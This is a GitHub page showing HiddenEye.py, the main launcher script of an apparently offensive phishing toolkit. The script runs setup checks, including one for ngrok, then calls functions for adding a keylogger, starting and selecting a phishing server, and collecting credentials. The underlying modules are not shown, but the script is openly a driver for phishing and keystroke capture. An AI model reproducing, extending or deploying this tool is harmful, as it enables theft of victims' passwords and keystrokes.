forked from hanshaze/fish
-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathHiddenEye.py
42 lines (35 loc) · 852 Bytes
/
HiddenEye.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
#!/usr/bin/python3
#
#HiddenEye by Open Source Community
#
import multiprocessing
import gettext
import sys
from Defs.Checks import *
from Defs.Configurations import *
from Defs.Actions import *
from Defs.Languages import *
from os import system
RED, WHITE, CYAN, GREEN, DEFAULT = '\033[91m', '\033[46m', '\033[36m', '\033[1;32m', '\033[0m'
checkPermissions()
installGetText()
languageSelector()
checkConnection()
checkNgrok()
ifSettingsNotExists()
readConfig()
if __name__ == "__main__":
try:
runMainMenu()
mainMenu()
keyloggerprompt()
addingkeylogger()
inputCustom()
##############
runServer()
selectServer()
multiprocessing.Process(target=runServer).start()
getCredentials()
except KeyboardInterrupt:
endMessage()
exit(0)